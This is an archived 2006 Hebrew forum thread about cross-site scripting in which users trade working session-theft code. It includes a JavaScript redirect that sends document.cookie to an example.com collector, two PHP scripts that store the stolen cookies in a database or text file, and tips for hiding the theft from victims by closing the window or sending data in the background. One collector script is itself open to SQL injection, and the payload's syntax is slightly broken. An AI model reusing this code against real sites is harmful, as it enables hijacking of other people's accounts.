ארכיון רד-בורד: משהו על XSS

29/08/2006 07:53:02 zull

כתבתי הסבר על XSS בבלוג שלי, כולל תמונות מסך מאתר שמאפשר הזרקת XSS.
לחץ כאן

29/08/2006 10:09:00 nel

תודה!

29/08/2006 12:24:09 MasterBlaster

יפה, באמת חסר חומר בעברית על ההתקפה הזאת. מכל מקום, נראה לי שהדבר ביחיד ששכחת זה להסביר איך ניתן לגנוב את ה-Cookies בעזרת Redirect, למשל:

קוד:"document.location=’http://www.example.com/xss.php?cookie=’document.cookie"

ואז קובץ ה-PHP יאחסן את הערך של ה-Cookie במסד נתונים או קובץ טקסט.[ההודעה נערכה על-ידי MasterBlaster ב-29/08/2006 12:26:14]

29/08/2006 12:30:40 Dn_A

בקוד שהבאת לגניבת עוגיות..
מה שמים במקום הדוגמה..?
אתה הכתובת של הקובת asp/php או את הקובץ טקסט..?

29/08/2006 12:51:25 MasterBlaster

ציטוט:בקוד שהבאת לגניבת עוגיות..
מה שמים במקום הדוגמה..?
אתה הכתובת של הקובת asp/php או את הקובץ טקסט..?
את example.com תחליף ב-Domain כלשהו שיש לך יכולת להעלות אליו קבצי קוד ב-PHP/ASP. קובץ PHP שמבצע את העבודה נראה בערך כך:

קוד:<?
$Cookie = $_GET["cookie"];
$Link = mysql_connect (’localhost’,’user’,’password’);
if (! $Link)
die (mysql_error());
mysql_select_db (’test’) || die (mysql_error());
$Query = ’INSERT INTO Cookies VALUES’ . $Cookie;
mysql_query ($Query);
mysql_close ($Link);
?>

לא בדקתי את הקוד, וכבר הרבה זמן שלא יצא לי לשבת על PHP, אבל בכל זאת נראה לי שזה יעבוד.[ההודעה נערכה על-ידי MasterBlaster ב-29/08/2006 12:52:29]

29/08/2006 13:21:07 zull

לא שכחתי לרשום, העדפתי שלא לרשום את זה בבלוג :-)
מי שירצה, יוכל לחפש ולדעת (כמו שעשיתם אתם)

30/08/2006 18:07:37 cp77fk4r

כל הכבוד על ההשקעה, אך לפי דעתי האישית לא חסר חומר על הנושא (לפחות בצורה הבסיסית) בעברית.
אבל שוב- כל הכבוד על ההשקעה.

01/09/2006 00:26:03 newbez

ציטוט:יפה, באמת חסר חומר בעברית על ההתקפה הזאת. מכל מקום, נראה לי שהדבר ביחיד ששכחת זה להסביר איך ניתן לגנוב את ה-Cookies בעזרת Redirect, למשל:

קוד:"document.location=’http://www.example.com/xss.php?cookie=’document.cookie"

ואז קובץ ה-PHP יאחסן את הערך של ה-Cookie במסד נתונים או קובץ טקסט.

[ההודעה נערכה על-ידי MasterBlaster ב-29/08/2006 12:26:14]
אבל רואים את זה בפבפן היה לי פעם דקריפט שלא היום רואים תשורה בדפדפן
אבל הסקריפט נאבד לי ואני לא זוכר אותו בעל פה מישהוא יכול לעזור?

01/09/2006 10:52:47 sysctl

ווא ווא מה הסתבכתם עם מסד נתונים
קוד:
<?php
$cookie1 = $_GET[’cookie’];
$textfile = fopen("cookie.txt", "a+");
fputs($textfile, $cookie1."\n\r");
fclose($textfile);
?>

bla.php?cookie=the.cookie
את "the cookie" הוא מכניס לתוך cookie.txt על השרת

01/09/2006 12:23:06 newbez

יש בעיה בקוד שלך הןא רק ממלא את הקובץ טקסט אבל לא רואים כלום
רואיחם שהגודל שלו הישתנה אבל לא רשום כלום

01/09/2006 16:06:58 MasterBlaster

ציטוט:ציטוט:יפה, באמת חסר חומר בעברית על ההתקפה הזאת. מכל מקום, נראה לי שהדבר ביחיד ששכחת זה להסביר איך ניתן לגנוב את ה-Cookies בעזרת Redirect, למשל:

קוד:"document.location=’http://www.example.com/xss.php?cookie=’document.cookie"

ואז קובץ ה-PHP יאחסן את הערך של ה-Cookie במסד נתונים או קובץ טקסט.

[ההודעה נערכה על-ידי MasterBlaster ב-29/08/2006 12:26:14]
אבל רואים את זה בפבפן היה לי פעם דקריפט שלא היום רואים תשורה בדפדפן
אבל הסקריפט נאבד לי ואני לא זוכר אותו בעל פה מישהוא יכול לעזור?
אם אתה רוצה אתה יכול להוסיף אחרי השורה הזאת את:
קוד:window.close();
ואז החלון של הדפדפן יסגר בכל פעם שמישהו יכנס אליו.[ההודעה נערכה על-ידי MasterBlaster ב-01/09/2006 16:07:24]

01/09/2006 20:38:40 newbez

לדעתי שמישהוא שממש מבין בזה יכתוב על זה
הרצאה או משהוא כדאי שכולם ידעו

02/09/2006 17:02:25 T4uSBaZ

יש לך המוןןן כתבות על הנושא.
זה בין הנושאים שהכי הרבה כותבים עליוו.. [ממה שראיתי] [בעברית]
יש באחד גליונות IKP על זה גם..

02/09/2006 18:37:10 tal

בד"כ כשגונבים cookie הפורץ משתמש בטכנולוגיה ש- AJAX מתבסס עלייה שאיתה ניתן לשלוח נתונים ברקע על ידי קוד Java Script בלי שהדפדפן אפילו עושה Refresh לדף.. וככה הנתונים נשלחים ללא ידיעת המשתמש...
אני לא ארחיב יותר מזה, מי שרוצה.. Should go GOOGLE IT.

רד-בורד: ארכיון

ראשי > אבטחת מידע > משהו על XSS